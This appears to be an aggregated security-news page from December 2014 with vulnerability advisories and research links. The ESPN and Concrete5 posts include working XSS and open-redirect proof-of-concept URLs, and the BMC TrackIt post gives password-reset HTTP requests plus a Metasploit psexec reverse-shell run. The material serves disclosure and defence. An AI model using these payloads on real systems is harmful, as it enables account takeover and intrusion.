Paper: Do not trust me: Using malicious IdPs for analyzing and attacking Single Sign-On

December 9, 2014, 11:07 am

≫ Next: Oxygen Forensics releases the new and free Oxygen Forensic Viewer

≪ Previous: Vulnerability in VBScript Scripting Engine Could Allow Remote Code Execution

$

0

0

Abstract. Single Sign-On (SSO) systems simplify login procedures by
using an an Identity Provider (IdP) to issue authentication tokens which
can be consumed by Service Providers (SPs). Traditionally, IdPs are
modeled as trusted third parties. This is reasonable for SSO systems like
Kerberos, MS Passport and SAML, where each SP explicitely specifies
which IdP he trusts. However, in open systems like OpenID and OpenID
Connect, each user may set up his own IdP, and a discovery phase is
added to the protocol flow. Thus it is easy for an attacker to set up its
own IdP
.
In this paper we use a novel approach for analyzing SSO authentication
schemes by introducing a malicious IdP. With this approach we evaluate
one of the most popular and widely deployed SSO protocols – OpenID
.
We found four novel attack classes on OpenID, which were not covered
by previous research, and show their applicability to real-life implementations.
As a result, we were able to compromise 11 out of 16 existing
OpenID implementations like Sourceforge, Drupal and ownCloud
.
We automated discovery of these attacks in a open source tool OpenID
Attacker, which additionally allows fine-granular testing of all parameters
in OpenID implementations.
Our research helps to better understand the message flow in the OpenID
protocol, trust assumptions in the different components of the system,
and implementation issues in OpenID components. It is applicable to
other SSO systems like OpenID Connect and SAML. All OpenID implementations
have been informed about their vulnerabilities and we
supported them in fixing the issues.

more here...........http://arxiv.org/pdf/1412.1623v1.pdf

---

Oxygen Forensics releases the new and free Oxygen Forensic Viewer

December 9, 2014, 11:09 am

≫ Next: ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

≪ Previous: Paper: Do not trust me: Using malicious IdPs for analyzing and attacking Single Sign-On

$

0

0

Oxygen Forensics releases Oxygen Forensic Viewer, a stand-alone tool for viewing and sharing information collected with Oxygen Forensic Suite. Fast, easy and lightweight, Oxygen Forensic Viewer allows accessing the complete set of evidence, analyzing deleted data, examining suspects’ communications and locating all types of evidence with built-in search. While the tool is available to licensed users of Oxygen Forensic Suite, the Suite itself is not required for installing and using Oxygen Forensic Viewer.

Effectively, Oxygen Forensic Viewer is a perfect tool for sharing information with colleagues and coworkers, enabling easy access to evidence collected with Oxygen Forensic Suite without additional costs and learning curve.

more here.........http://www.forensicfocus.com/News/article/sid=2307/

ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

December 9, 2014, 1:10 pm

≫ Next: CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

≪ Previous: Oxygen Forensics releases the new and free Oxygen Forensic Viewer

$

0

0

*ESPN espn.go.com <http://espn.go.com/> Login & Register Page XSS and Dest
Redirect Privilege Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


*"*As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States.[2]
<http://en.wikipedia.org/wiki/ESPN#cite_note-2> In addition to the flagship
channel and its seven related channels in the United States, ESPN
broadcasts in more than 200 countries,[3]
<http://en.wikipedia.org/wiki/ESPN#cite_note-ESPN_Inc-3> operating regional
channels in Australia <http://en.wikipedia.org/wiki/Australia>, Brasil
<http://en.wikipedia.org/wiki/Brasil>, Latin America
<http://en.wikipedia.org/wiki/Latin_America> and the United Kingdom
<http://en.wikipedia.org/wiki/United_Kingdom>, and owning a 20% interest in The
Sports Network <http://en.wikipedia.org/wiki/The_Sports_Network> (TSN) as
well as its five sister networks and NHL Network
<http://en.wikipedia.org/wiki/NHL_Network_%28Canada%29> in Canada
<http://en.wikipedia.org/wiki/Canada>." (Wikipedia)






*Vulnerability description:*

Espn.go.com <http://espn.go.com/> has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
Redirect) attacks.


Those vulnerabilities are very dangerous. Since they happen at ESPN's
"login" & "register" pages that are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at "espn.go.com"'s "login?" & "register" pages
with "redirect" parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img
src=x onerror=prompt('justqdjing')>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img
src=x onerror=prompt('justqdjing')>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img
src=x onerror=prompt('justqdjing')>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img
src=x onerror=prompt('justqdjing')>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html>




*(2) Dest Redirect Privilege Escalation Vulnerability*

Use one of webpages for the following tests. The webpage address is "
http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
<http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828>

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112
<http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112>

*POC:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com
?



This vulnerability was used to demonstrate "Covert Redirect" of Facebook,

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/




*Vulnerable URL 2:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017
<http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017>

*POC:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com





*Vulnerable URL 3:*
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com





*Poc Video:*
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espn.html
<http://securityrelated.blogspot.sg/2014/12/espn-espn.html>







*(3) *Those security problems were reported to ESPN in early May. However,
they are still unpatched.







Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss_9.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html>

CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

December 9, 2014, 1:11 pm

≫ Next: CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

≪ Previous: ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

$

0

0

*CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints"
Dest Redirect Privilege Escalation Security Vulnerability*





Exploit Title: "Ping Identity Corporation" "PingFederate 6.10.1 SP
Endpoints" Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]








*Advisory Details*



*(1) Product:*
"PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning."




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at "/startSSO.ping?" page with
"&TargetResource" parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/

CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

December 9, 2014, 1:11 pm

≫ Next: Keurig 2.0 Genuine K-Cup Spoofing Vulnerability

≪ Previous: CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

$

0

0

*CVE-2014-8751  goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*







Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details:*

*(1) Product*
"WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself."



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at "/search.php" page with
"&search_param" parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at "/forms.php" (form
submission ) page with "&name", "&address" "&comment" parameters in HTTP
POST.










*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/

Keurig 2.0 Genuine K-Cup Spoofing Vulnerability

December 9, 2014, 1:12 pm

≫ Next: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities

≪ Previous: CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

$

0

0

*Overview*


Keurig 2.0 Coffee Maker contains a vulnerability in which the authenticity
of coffee pods, known as K-Cups, uses weak verification methods, which are
subject to a spoofing attack through re-use of a previously verified K-Cup.


*Impact*


CVSS Base Score: 4.9

Impact Subscore: 6.9

Exploitability Subscore: 3.9


Access Vector: Local

Access Complexity: Low

Authentication: None


Confidentiality Impact: None

Integrity Impact: Complete

Availability Impact: None


*Vulnerable Versions*

Keurig 2.0 Coffee Maker


*Technical Details*


Keurig 2.0 is designed to only use genuine Keurig approved coffee K-Cups.
However, a flaw in the verification method allows an attacker to use
unauthorized K-Cups. The Keurig 2.0 does verify that the K-Cup foil lid
used for verification is not re-used.


Step 1: Attacker uses a genuine K-Cup in the Keurig machine to brew coffee
or hot chocolate.

Step 2: After brewing is complete, attacker removes the genuine K-Cup from
the Keurig and uses a knife or scissors to carefully remove the full foil
lid from the K-Cup, ensuring to keep the full edges intact. Attacker keeps
this for use in the attack.

Step 3: Attacker inserts a non-genuine K-Cup in the Keurig, and closes the
lid. Attacker should receive an "oops" error message stating that the K-Cup
is not genuine.

Step 4: Attacker opens the Keurig, leaving the non-genuine K-Cup in the
Keurig, and carefully places the previously saved genuine K-Cup lid on top
of the non-genuine K-Cup, lining up the puncture hole to keep the lid in
place.

Step 5: Attacker closes the Keurig, and is able to brew coffee using the
non-genuine K-Cup.


Since no fix is currently available, owners of Keurig 2.0 systems may wish
to take additional steps to secure the device, such as keeping the device
in a locked cabinet, or using a cable lock to prevent the device from being
plugged in when not being used by an authorized user.


Please note that a proof of concept is already available online.


*Credit: *

Proof of concept at http://www.keurighack.com/

Vulnerability Writeup by Ken Buckler, Caffeine Security
http://caffeinesecurity.blogspot.com

Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities

December 9, 2014, 1:23 pm

≫ Next: Multiple vulnerabilities in InfiniteWP Admin Panel

≪ Previous: Keurig 2.0 Genuine K-Cup Spoofing Vulnerability

$

0

0

Title: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 02 November 2014
Updated: 9 December 2014
Published: 9 December 2014
MorXploit Research
http://www.MorXploit.com
Vendor: Concrete5
Vendor url: www.concrete5.org
Software: Concrete5 CMS
Versions: 5.7.2 and 5.7.2.1 (probably older)
Status: Unpatched
Vulnerable scripts:
single_pages/dashboard/users/groups/bulkupdate.php
tools/dashboard/sitemap_drag_request.php
Original document: http://morxploit.com/morxploits/morxconxss.txt

About Concrete5 (from Wikipedia):
Concrete5 is an open source content management system (CMS) for publishing content on the World Wide Web and intranets.
Concrete5 was designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides version management for every page, similar to wiki software, another type of web site development software. concrete5 allows users to edit images through an embedded editor on the page.

To learn more please visit:
http://en.wikipedia.org/wiki/Concrete5
http://www.concrete5.org/

Description:
Concrete5 is vulnerable to Cross-Site Scripting, both bulkupdate.php and sitemap_drag_request.php scripts fail to properly sanitize user-supplied input.

PoC Exploit:
bulkupdate.php XSS is exploitable through $_REQUEST['gName']

Using HTTP GET Method:
http://target/index.php/dashboard/users/groups/bulkupdate/search?gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search

Using HTTP POST Method:
POST http://target/index.php/dashboard/users/groups/bulkupdate/search

POST DATA:
gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search


sitemap_drag_request.php XSS is triggered through $_REQUEST['instance_id'] but requires a valid ccm_token value which makes it unexploitable (unless the attacker somehow obtains a valid token)

Using HTTP GET Method:
http://target/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id="><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=over

Mitigation:
Validate/Sanitize user supplied-input through $_REQUEST['gName'] and $_REQUEST['instance_id']

Disclosure time-line
02 November 2014: Discovery.
03 November 2014: Initial report sent.
11 November 2014: Second contact.
No response.
09 December 2014: Public disclosure.

Author disclaimer:
The information contained in this entire document is for educational, demonstration and testing purposes only.
Author cannot be held responsible for any malicious use or damage. Use at your own risk.

Multiple vulnerabilities in InfiniteWP Admin Panel

December 9, 2014, 4:10 pm

≫ Next: 'Destover' Malware Now Digitally Signed by Sony Certificates

≪ Previous: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities

$

0

0

Multiple vulnerabilities in InfiniteWP Admin Panel
https://lifeforms.nl/20141210/infinitewp-vulnerabilities/

-----

InfiniteWP (http://www.infinitewp.com/) allows an administrator to manage multiple Wordpress sites from one control panel. According to the InfiniteWP homepage, it is used on over 317,000 Wordpress sites.

The InfiniteWP Admin Panel contains a number of vulnerabilities that can be exploited by an unauthenticated remote attacker.

These vulnerabilities allow taking over managed Wordpress sites by leaking secret InfiniteWP client keys, allow SQL injection, allow cracking of InfiniteWP admin passwords, and in some cases allow PHP code injection.

It is strongly recommended that InfiniteWP users upgrade to InfiniteWP Admin Panel 2.4.4, and apply the recommendations at the end of this post.

-----

Issue 1: login.php unauthenticated SQL injection vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.2

User-controlled parameter email appears in a SQL query modified by function filterParameters() which ostensibly "filters" its arguments, but escaping is not being performed, because the parameter $DBEscapeString is set to false by default. This allows for SQL injection.

-----

Issue 2: execute.php unauthenticated SQL injection vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.3

User-controlled parameter historyID appears without quotes in a SQL query. Additionally, user-controlled parameters historyID and actionID should be escaped by function filterParameters(), but escaping is not being performed, because $DBEscapeString is set to false by default. This allows for SQL injection.

-----

Issue 3: uploadScript.php unrestricted file upload vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.3

Unauthenticated users can upload various file types to the uploads directory, including .php files, if query parameter allWPFiles is set. File names however are suffixed with the .swp extension when written to the file system.

If the following two conditions hold, this leads to PHP injection:

1. The uploads directory must be writable by the webserver.
2. The webserver must interpret *.php.swp files as PHP code, which happens when Apache is used with configuration 'AddHandler application/x-httpd-php .php' or 'AddType application/x-httpd-php .php' (This is discouraged by PHP, but older distributions and some shared hosts use it)

-----

Issue 4: Insecure password storage
Vulnerable: All versions including current (2.4.4)

Passwords are stored as unsalted SHA1 hashes in iwp_users.password. These passwords can easily be cracked.

Cracking a password allows a successful attacker to keep their access to the admin panel even after security updates are applied.

-----

Recommendations

We recommend that users of InfiniteWP take the following actions:

1. Upgrade InfiniteWP Admin Panel to version 2.4.4.
2. Check the uploads directory for the presence of any unauthorized file uploads.
3. Change admin passwords for the InfiniteWP Admin Panel and any Wordpress sites in the panel. Use long and unique passwords.
4. Remove and re-add Wordpress sites to the InfiniteWP Admin Panel, in order to generate new secret keys.
5. Strongly consider limiting access to the InfiniteWP Admin Panel, especially if you do not require customer access to the panel. For instance, use a .htaccess file to add authentication and limit IP addresses. If possible, protect the panel with a web application firewall (WAF) such as ModSecurity.

-----

Timeline

- 26 Nov: Vulnerabilities and patches submitted to InfiniteWP
- 27 Nov: InfiniteWP publishes version 2.4.3 with fix for issue 1
- 4 Dec: Incomplete fix reported to InfiniteWP
- 9 Dec: InfiniteWP publishes version 2.4.4 with fix for issues 2-3
- 10 Dec: Vulnerabilities published

-----

Credits

The vulnerabilities were found by Walter Hop, Slik BV (http://www.slik.eu/), The Netherlands.

---

'Destover' Malware Now Digitally Signed by Sony Certificates

December 9, 2014, 5:19 pm

≫ Next: Hiding In Plain Sight

≪ Previous: Multiple vulnerabilities in InfiniteWP Admin Panel

$

0

0

Several days ago, our products detected an unusual sample from the Destover family. The Destover family of trojans has been used in the high profile attacks known as DarkSeoul, in March 2013, and more recently, in the attack against Sony pictures in November 2014. We wrote about it on December 4th, including the possible links with the Shamoon attack from 2012.

more here..........https://securelist.com/blog/security-policies/68073/destover-malware-now-digitally-signed-by-sony-certificates/

Hiding In Plain Sight

December 9, 2014, 8:17 pm

≫ Next: Hidden Costs of Memory Allocation

≪ Previous: 'Destover' Malware Now Digitally Signed by Sony Certificates

$

0

0

Malware authors are known for developing clever, interesting and sometimes dastardly ways to move, hide and distribute their wares to the masses.

They often work tirelessly to stay ahead of security analysts by playing on doubts, limitations and red tape. Some authors use trivial encryptions or encoding schemes like base64 while others use high-grade encryption or perform small modifications to a file to avoid detection.

If that does not work, the attacker can hide content in, or append content to image files or files made to look like images, but structurally they are another file type entirely. From a forensic standpoint, some of these files do not have a known structure and can be extremely difficult to identify and categorize, therefore they fall into the anomalous category.

more here.........http://www.solutionary.com/resource-center/blog/2014/12/analyzing-anomalous-data-structures/

Hidden Costs of Memory Allocation

December 10, 2014, 7:50 am

≫ Next: Reproducible Malware Analyses for All

≪ Previous: Hiding In Plain Sight

$

0

0

It’s important to understand the cost of memory allocations, but this cost can be surprisingly tricky to measure. It seems reasonable to measure this cost by wrapping calls to new[] and delete[] with timers. However, for large buffers these timers may miss over 99% of the true cost of these operations, and these hidden costs are larger than I had expected.

more here...........http://randomascii.wordpress.com/2014/12/10/hidden-costs-of-memory-allocation/

Reproducible Malware Analyses for All

December 10, 2014, 7:51 am

≫ Next: Now available: white papers on Regin's stage 1 components.

≪ Previous: Hidden Costs of Memory Allocation

$

0

0

Summary: With help from GTISC, I have begun running 100 malware samples per day and posting the PANDA record & replay logs online at http://panda.gtisc.gatech.edu/malrec/. The goal is to lower the barriers to entry for doing dynamic malware research, and to make such research reproducible.

more here.......http://moyix.blogspot.com/2014/12/reproducible-malware-analyses-for-all.html

Now available: white papers on Regin's stage 1 components.

December 10, 2014, 8:21 pm

≫ Next: WordpreXSS Exploitation

≪ Previous: Reproducible Malware Analyses for All

$

0

0

These are meant be to a contribution for those who are inspecting their own systems and configurations. The papers provide analysis of the components that most people will run into first if Regin is present, and hopefully this will help identify future versions.

more here.........https://www.f-secure.com/weblog/archives/00002774.html

WordpreXSS Exploitation

December 11, 2014, 4:23 am

≫ Next: RedCloth contains unfixed XSS vulnerability for 9 years

≪ Previous: Now available: white papers on Regin's stage 1 components.

$

0

0

In today’s post I am going to show a real-world example of stealing someone’s WordPress credentials using XSS exploitation, and getting shell access to the underlying host.

more here..........https://blog.gaborszathmari.me/2014/12/10/wordpress-exploitation-with-xss/

RedCloth contains unfixed XSS vulnerability for 9 years

December 11, 2014, 12:28 pm

≫ Next: BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

≪ Previous: WordpreXSS Exploitation

$

0

0

I disclosed the following advisory about a XSS vulnerability of
RedCloth (Textile library for Ruby).
http://co3k.org/blog/redcloth-unfixed-xss-en

You shouldn't use RedCloth to parse user inputted contents and output
the parsed string (except that you allow your
user to write arbitrary JavaScript code on your site) because it
contains unfixed XSS vulnerability for 9 years,
and it be also disclosed for 2 years.

Unfortunately, we may not expect fix the vulnerability by the current
developer because he announced that "unable to
keep fixing bugs or work on the next major release".

If you want to continue to use RedCloth for such contents, you should
patch for the problem yourself, consider
contributing to RedCloth, or otherwise.

PoC
===

```
require 'redcloth'

print RedCloth.new('["clickme":javascript:alert(%27XSS%27)]',
[:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html

# Result:
# <p><a href="javascript:alert(%27XSS%27)">clickme</a></p>
```

Timeline
========

* Feb. 24, 2012 : I reported the problem to a developer (by sending e-mail)
* Feb. 29, 2012 : A developer discloses the issue in this ticket:
http://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
* ...
* Sep. 24, 2014 : Announced "RedCloth needs new maintainers" to take
over RedCloth by a developer:
https://github.com/jgarber/redcloth/commit/b24f03db023d1653d60dd33b28e09317cd77c6a0

---

BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

December 11, 2014, 12:30 pm

≫ Next: Archie and Astrum: New Players in the Exploit Kit Market

≪ Previous: RedCloth contains unfixed XSS vulnerability for 9 years

$

0

0

BMC TrackIt! 11.3 Unauthenticated Local User Password Change
Trial available here: http://www.trackit.com

A Metasploit pull request has been made here:
https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated
user to change any local user's password, such as Administrator. If the
ability to log in remotely via SMB is enabled on the server, this can yield
an unauthenticated user a shell of SYSTEM using the psexec module in
Metasploit. This was tested against Windows Server 2008 R2 in a relatively
default (trackit installs SQL server) installation. A domain was set up and
the web server was added to the domain. Domain credentials were not able to
be set, only local users.

Using the Registration link in the top right of the
/PasswordReset/Application/Main page, the UI requires the user's password
to continue. However, the request made after to actually register the local
user is disparate from the authentication request and can be sent
independently. This allows an unauthenticated user to now reset that user's
password. Because the Password Reset form makes a separate distinct request
to check the answers to the secret question, the request to actually change
a user's password can be made as any user.

The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%
40fdsafdsa.com
&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required in that a GET to the /PasswordReset/
and using the subsequent Set-Cookie in all subsequent requests as the
cookie. The domainname parameter can the the name of the computer, which is
the default value on the registration page. The userName parameter is the
user to register with the application. You can attempt this is with a user
already registered with no issue (though probably changing the secret
answers to known values is probably bad too).

The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters should match those supplied in the
previous registration request. The newPassword parameter will need to meet
any local standard enforced by GPO.

Combining these two requests will allow an unauthorised user to register a
local user to be elegible for a password reset via the password reset form,
then take advantage of the subsequent password reset vulnerability to
change the password of any local user, including Administrator.

Supplied is a metasploit auxiliary module which will change the password of
the Administrator user by default, then print the domain, username, and
password to user with psexec in order to log in over SMB.

The below Metasploit run details changing the password with the attached
module. Setting the password to the one reported by the auxiliary module,
psexec is run again and a shell as NT USER/SYSTEM is gained.


msf auxiliary(bmc_trackit_pwd_reset) > show options

Module options (auxiliary/gather/bmc_trackit_pwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default
the local user's computer name will be autodetected
   LOCALUSER  Administrator    yes       The local user to change password
for
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.57     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The path to BMC TrackIt
   VHOST                       no        HTTP server virtual host

msf auxiliary(bmc_trackit_pwd_reset) > run

[*] Please run the psexec module using:
[*] WIN-P3AET0NFP1N\Administrator:qGSvnJeuNO!1
[*] Auxiliary module execution completed
msf auxiliary(bmc_trackit_pwd_reset) > use exploit/windows/smb/psexec

msf exploit(psexec) >
msf exploit(psexec) > set SMBPass qGSvnJeuNO!1
SMBPass => qGSvnJeuNO!1
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.57:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
